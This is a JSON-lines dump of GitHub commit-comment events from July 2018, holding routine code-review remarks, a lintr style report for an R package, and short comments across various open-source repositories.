{"id":"8011039931","type":"CommitCommentEvent","actor":{"login":"alaviss"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29816148,"position":10,"line":10,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-24T15:39:01Z","updated_at":"2018-07-24T15:39:01Z","author_association":"CONTRIBUTOR","body":"The libreoffice people [recommend](https://wiki.documentfoundation.org/Libexttextcat) fetching it from their mirror for release builds\r\n\r\nhttps://dev-www.libreoffice.org/src/libexttextcat/libexttextcat-3.4.5.tar.xz\r\n\r\nI haven't check, but there might be some more stuff in there that's not in the github tarball (most likely configure scripts)"}},"created_at":"2018-07-24T15:39:01Z"}
{"id":"8011040419","type":"CommitCommentEvent","actor":{"login":"MikeTaylor"},"repo":{"name":"natali-zaitseva/stripes-core"},"payload":{"comment":{"id":29816149,"position":4,"line":249,"path":"src/loginServices.js","commit_id":"4b3cefa6b86715bb6723b2cac72d9022cbe5cd9b","created_at":"2018-07-24T15:39:06Z","updated_at":"2018-07-24T15:39:06Z","author_association":"NONE","body":"This should be spelled `requestUserCredentialsExistence`. (if we need it at all.)"}},"created_at":"2018-07-24T15:39:06Z"}
{"id":"8011041118","type":"CommitCommentEvent","actor":{"login":"dostaljsembanalemamnovyucet"},"repo":{"name":"AcidProxy/Acid"},"payload":{"comment":{"id":29816150,"position":7,"line":7,"path":"src/proxy/command/DefaultCommand.php","commit_id":"12060144794dd92cc04def603443f81605555a69","created_at":"2018-07-24T15:39:12Z","updated_at":"2018-07-24T15:39:12Z","author_association":"CONTRIBUTOR","body":"k psr-4"}},"created_at":"2018-07-24T15:39:12Z"}
{"id":"8011045796","type":"CommitCommentEvent","actor":{"login":"GamakCZ"},"repo":{"name":"AcidProxy/Acid"},"payload":{"comment":{"id":29816158,"position":7,"line":7,"path":"src/proxy/command/DefaultCommand.php","commit_id":"12060144794dd92cc04def603443f81605555a69","created_at":"2018-07-24T15:39:56Z","updated_at":"2018-07-24T15:39:56Z","author_association":"CONTRIBUTOR","body":"??? ta třída se nikde nepoužívá"}},"created_at":"2018-07-24T15:39:56Z"}
{"id":"8011050095","type":"CommitCommentEvent","actor":{"login":"dostaljsembanalemamnovyucet"},"repo":{"name":"AcidProxy/Acid"},"payload":{"comment":{"id":29816165,"position":7,"line":7,"path":"src/proxy/command/DefaultCommand.php","commit_id":"12060144794dd92cc04def603443f81605555a69","created_at":"2018-07-24T15:40:35Z","updated_at":"2018-07-24T15:40:35Z","author_association":"CONTRIBUTOR","body":"ale bude"}},"created_at":"2018-07-24T15:40:35Z"}
{"id":"8011055672","type":"CommitCommentEvent","actor":{"login":"janschreiber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29816171,"position":47,"line":25820,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"9d94c1fc3ff1311206f962c1518cb559a0568b9c","created_at":"2018-07-24T15:41:26Z","updated_at":"2018-07-24T15:41:26Z","author_association":"MEMBER","body":"Grundsätzlich ja, natürlich. Aber bei biblischen Namen bin ich unsicher. Den Namen \"Jesus\" z. B. möchte ich unbedingt im normalen Wörterbuch haben.\r\nhttp://www.bibelwissenschaft.de/wibilex/das-bibellexikon/lexikon/sachwort/anzeigen/details/jeschua/ch/566437c12a05a9d60d75000476122284/"}},"created_at":"2018-07-24T15:41:26Z"}
{"id":"8011055681","type":"CommitCommentEvent","actor":{"login":"nsamsono"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29816172,"position":283,"line":305,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T15:41:26Z","updated_at":"2018-07-24T15:41:26Z","author_association":"NONE","body":"Since we have VLAN packet type support in HW parser offloading, you can use it as follows: \r\nif (!(rx_pkts[i]->packet_type & RTE_PTYPE_L2_ETHER_VLAN)) {\r\n...\r\n}"}},"created_at":"2018-07-24T15:41:26Z"}
{"id":"8011057172","type":"CommitCommentEvent","actor":{"login":"roboturx"},"repo":{"name":"roboturx/aa"},"payload":{"comment":{"id":29816173,"position":null,"line":null,"path":null,"commit_id":"59655e74e5457e4fcf751ab6dce0ef07af10df52","created_at":"2018-07-24T15:41:40Z","updated_at":"2018-07-24T15:41:40Z","author_association":"OWNER","body":"<za"}},"created_at":"2018-07-24T15:41:40Z"}
{"id":"8011057679","type":"CommitCommentEvent","actor":{"login":"qiwzhang"},"repo":{"name":"MoSBanapple/ShopApp-Server"},"payload":{"comment":{"id":29816175,"position":739,"line":395,"path":"main.go","commit_id":"bb9f0578dc7701daa71dd1da4806bf1d46e825fa","created_at":"2018-07-24T15:41:45Z","updated_at":"2018-07-24T15:41:45Z","author_association":"COLLABORATOR","body":"This is not the way to generate JSON.  \r\n\r\nPlease take a look at:  https://stackoverflow.com/questions/8270816/converting-go-struct-to-json\r\n"}},"created_at":"2018-07-24T15:41:45Z"}
{"id":"8011060194","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"Buzyuka/algorithms_lesson"},"payload":{"comment":{"id":29816180,"position":4,"line":4,"path":"a3.py","commit_id":"a3aa72a4054e220bea71369903a549e80e745c76","created_at":"2018-07-24T15:42:09Z","updated_at":"2018-07-24T15:42:09Z","author_association":"NONE","body":"Даже так? Класс! \r\nВы ответственно подошли к ДЗ.\r\nСпециально читали про seq или знали о нём до этого?"}},"created_at":"2018-07-24T15:42:09Z"}
{"id":"8011062252","type":"CommitCommentEvent","actor":{"login":"ortem"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":29816182,"position":4,"line":115,"path":"src/main/kotlin/org/rust/stdext/Collections.kt","commit_id":"22efa6e113bcf19c4721333dc77d70fb3b38517c","created_at":"2018-07-24T15:42:26Z","updated_at":"2018-07-24T15:42:26Z","author_association":"COLLABORATOR","body":"Maybe `joinToWithBuffer` due to `buffer: StringBuilder` parameter?"}},"created_at":"2018-07-24T15:42:26Z"}
{"id":"8011063607","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29816184,"position":null,"line":null,"path":null,"commit_id":"8955644e28c67ffd48e11ddc395c783daacde16e","created_at":"2018-07-24T15:42:38Z","updated_at":"2018-07-24T15:42:38Z","author_association":"NONE","body":"[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:119:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/invoercontroleData_soortenKenmerken.R#L119) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:475:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/inst/tests/testthat/test_1_databank.R#L475) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:476:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/inst/tests/testthat/test_1_databank.R#L476) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:555:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/inst/tests/testthat/test_berekenLSVIbasis.R#L555) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:556:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/inst/tests/testthat/test_berekenLSVIbasis.R#L556) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/8955644e28c67ffd48e11ddc395c783daacde16e/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-24T15:42:38Z"}
{"id":"8011069127","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29816203,"position":null,"line":null,"path":null,"commit_id":"17e0d3004e7ac156601af59aa9532f98bfc0df43","created_at":"2018-07-24T15:43:27Z","updated_at":"2018-07-24T15:43:27Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/88"}},"created_at":"2018-07-24T15:43:27Z"}
{"id":"8011073132","type":"CommitCommentEvent","actor":{"login":"qiwzhang"},"repo":{"name":"MoSBanapple/ShopApp-Server"},"payload":{"comment":{"id":29816214,"position":661,"line":327,"path":"main.go","commit_id":"bb9f0578dc7701daa71dd1da4806bf1d46e825fa","created_at":"2018-07-24T15:44:02Z","updated_at":"2018-07-24T15:44:02Z","author_association":"COLLABORATOR","body":"There is better ways to convert an array of objects to JSON"}},"created_at":"2018-07-24T15:44:02Z"}
{"id":"8011073175","type":"CommitCommentEvent","actor":{"login":"DBOTW"},"repo":{"name":"EtchedPixels/xtrs"},"payload":{"comment":{"id":29816216,"position":null,"line":null,"path":null,"commit_id":"60c2f8f958f088b02e2d281eb871682076251623","created_at":"2018-07-24T15:44:03Z","updated_at":"2018-07-24T15:44:03Z","author_association":"NONE","body":"Message in `fakerom.z80` should be in uppercase to make it readable without `-lower`:\r\n```diff\r\ndiff --git a/fakerom.z80 b/fakerom.z80\r\nindex a79cf47..4999814 100644\r\n--- a/fakerom.z80\r\n+++ b/fakerom.z80\r\n@@ -34,7 +34,7 @@ mod4p:        ld      hl,model-fakemsg+video\r\n        ld      (hl),'P'\r\n        jr      $\r\n \r\n-fakemsg:defb   'You do not have a ROM image installed for Model '\r\n+fakemsg:defb   'YOU DO NOT HAVE A ROM IMAGE INSTALLED FOR MODEL '\r\n model  equ     $\r\n fmend  equ     $\r\n m4msg: defb    '(Model 4 mode requires a Model 3 ROM image)'\r\n```"}},"created_at":"2018-07-24T15:44:03Z"}
{"id":"8011077029","type":"CommitCommentEvent","actor":{"login":"seanmonstar"},"repo":{"name":"hyperium/http"},"payload":{"comment":{"id":29816228,"position":null,"line":null,"path":null,"commit_id":"ab2ca71ead2a07e861a30637dc3fe1c300701a4e","created_at":"2018-07-24T15:44:39Z","updated_at":"2018-07-24T15:44:39Z","author_association":"MEMBER","body":"They are not related to any specific, and are otherwise completely unrelated to HTTP. This type allows for storing arbitrary extra data with a request or response for an application or library. We hope for the http crate to be usable by many libs, and know that in various cases, developers want to include extra data when receiving a request or response.\r\n\r\nAn example is some sort of Middleware could insert some app-specific context that a latter layer needs. Or another could insert a start time type, and then calculate request time on the other side."}},"created_at":"2018-07-24T15:44:39Z"}
{"id":"8011078350","type":"CommitCommentEvent","actor":{"login":"dmdada"},"repo":{"name":"dmdada/C-C-"},"payload":{"comment":{"id":29816237,"position":null,"line":null,"path":null,"commit_id":"66d9e09e191518bdd3f66a80e1aed07cd3a9a1d5","created_at":"2018-07-24T15:44:51Z","updated_at":"2018-07-24T15:44:51Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-24T15:44:51Z"}
{"id":"8011079923","type":"CommitCommentEvent","actor":{"login":"Speentie8081"},"repo":{"name":"sk89q/WorldGuard"},"payload":{"comment":{"id":29816243,"position":null,"line":null,"path":null,"commit_id":"173a9a320de50d374d64b6485ab799be58277d25","created_at":"2018-07-24T15:45:07Z","updated_at":"2018-07-24T15:45:07Z","author_association":"NONE","body":"@me4502 can you fix compiling with gradle? It fails to compile, and i'd like to use this updated version of worldguard."}},"created_at":"2018-07-24T15:45:07Z"}
{"id":"8011081015","type":"CommitCommentEvent","actor":{"login":"amensouissi"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29816248,"position":null,"line":null,"path":null,"commit_id":"dc749e8c53cfeef7e6dbf8fa061249c3194020ee","created_at":"2018-07-24T15:45:16Z","updated_at":"2018-07-24T15:45:16Z","author_association":"CONTRIBUTOR","body":"In my opinion withRouter is bulky for this need. The solution must be independent. But yes we can use withRouter as the first solution."}},"created_at":"2018-07-24T15:45:16Z"}
{"id":"8011082317","type":"CommitCommentEvent","actor":{"login":"rajeevmurballa"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29816253,"position":58,"line":58,"path":"Contracts/02_IRidePreICO.sol","commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T15:45:29Z","updated_at":"2018-07-24T15:45:29Z","author_association":"NONE","body":"dear your project is very unique. i hope this project is very good result for futur."}},"created_at":"2018-07-24T15:45:29Z"}
{"id":"8011085989","type":"CommitCommentEvent","actor":{"login":"LLLniqun"},"repo":{"name":"LLLniqun/LLLniqun.github.io"},"payload":{"comment":{"id":29816261,"position":null,"line":null,"path":null,"commit_id":"e81227cbad7d14f0ccf9aa2c3aa12015835ddb03","created_at":"2018-07-24T15:46:02Z","updated_at":"2018-07-24T15:46:02Z","author_association":"OWNER","body":"傻瓜"}},"created_at":"2018-07-24T15:46:02Z"}
{"id":"8011086628","type":"CommitCommentEvent","actor":{"login":"amcor"},"repo":{"name":"guadaltech/l10n-spain"},"payload":{"comment":{"id":29816263,"position":16,"line":418,"path":"l10n_es_aeat_sii/models/account_invoice.py","commit_id":"b3c9bf4c94b729cf677a4cfd6da04f71c5c9a1ea","created_at":"2018-07-24T15:46:08Z","updated_at":"2018-07-24T15:46:08Z","author_association":"COLLABORATOR","body":"Hi ! \r\nThe real problem is the function name, price subtotal doesnt appear because in compute all functions to taxes we need the quantity, is from previous versions ... In next commit i fix it!\r\n\r\n    def _get_sii_line_price_subtotal(self, cr, uid, line):\r\n        \"\"\"Obtain the effective invoice line price after discount.\"\"\"\r\n        return line.price_unit * (1 - (line.discount or 0.0) / 100.0)\r\n\r\nRegards!"}},"created_at":"2018-07-24T15:46:08Z"}
{"id":"8011090373","type":"CommitCommentEvent","actor":{"login":"rajeevmurballa"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29816267,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T15:46:41Z","updated_at":"2018-07-24T15:46:41Z","author_association":"NONE","body":"dear your project is very good. i hope this project is very good result for futur. "}},"created_at":"2018-07-24T15:46:41Z"}
{"id":"8011096761","type":"CommitCommentEvent","actor":{"login":"aharui"},"repo":{"name":"apache/royale-compiler"},"payload":{"comment":{"id":29816278,"position":null,"line":null,"path":null,"commit_id":"50310050f62d741d3ce4a4aab06e07eb9c2610bf","created_at":"2018-07-24T15:47:40Z","updated_at":"2018-07-24T15:47:40Z","author_association":"CONTRIBUTOR","body":"Seems like it should be ok to use the interface?  Give it a try and see what happens."}},"created_at":"2018-07-24T15:47:40Z"}
{"id":"8011097799","type":"CommitCommentEvent","actor":{"login":"m1ndgames"},"repo":{"name":"m1ndgames/sc2ladderobserver"},"payload":{"comment":{"id":29816280,"position":null,"line":null,"path":null,"commit_id":"6b41a8740316beb451485462693bd098cc3ad81e","created_at":"2018-07-24T15:47:50Z","updated_at":"2018-07-24T15:47:50Z","author_association":"OWNER","body":"Hey, now that the Observer does fullscreen and production tab, this code is not needed anymore."}},"created_at":"2018-07-24T15:47:50Z"}
{"id":"8011101465","type":"CommitCommentEvent","actor":{"login":"xeraa"},"repo":{"name":"aaronoah/kibana_calendar_vis"},"payload":{"comment":{"id":29816284,"position":null,"line":null,"path":null,"commit_id":"747b75687849c3f458e8981403c0e2a6b7cbebd6","created_at":"2018-07-24T15:48:25Z","updated_at":"2018-07-24T15:48:25Z","author_association":"NONE","body":"That makes sense, great."}},"created_at":"2018-07-24T15:48:25Z"}
{"id":"8011106641","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29816300,"position":null,"line":null,"path":null,"commit_id":"73d7fac4cd4e87f3957600ce9156e38e2f07e46c","created_at":"2018-07-24T15:49:14Z","updated_at":"2018-07-24T15:49:14Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Upload Picture / Profile Image](https://trello.com/c/BYKvAtuw/30-upload-picture-profile-image)"}},"created_at":"2018-07-24T15:49:14Z"}
{"id":"8011108025","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29816306,"position":null,"line":null,"path":null,"commit_id":"83ceac2aa21c27ca47cf4b29780f603fd918ff47","created_at":"2018-07-24T15:49:28Z","updated_at":"2018-07-24T15:49:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Upload Picture / Profile Image](https://trello.com/c/BYKvAtuw/30-upload-picture-profile-image)"}},"created_at":"2018-07-24T15:49:28Z"}
{"id":"8011110781","type":"CommitCommentEvent","actor":{"login":"hasan903"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29816312,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T15:49:54Z","updated_at":"2018-07-24T15:49:54Z","author_association":"NONE","body":"It is really great project"}},"created_at":"2018-07-24T15:49:54Z"}
{"id":"8011116475","type":"CommitCommentEvent","actor":{"login":"lnyangguang"},"repo":{"name":"lnyangguang/Test"},"payload":{"comment":{"id":29816323,"position":null,"line":null,"path":null,"commit_id":"1fe5f0fe285545945e0f1a251052cfd4fbf2ea46","created_at":"2018-07-24T15:50:49Z","updated_at":"2018-07-24T15:50:49Z","author_association":"OWNER","body":"del"}},"created_at":"2018-07-24T15:50:49Z"}
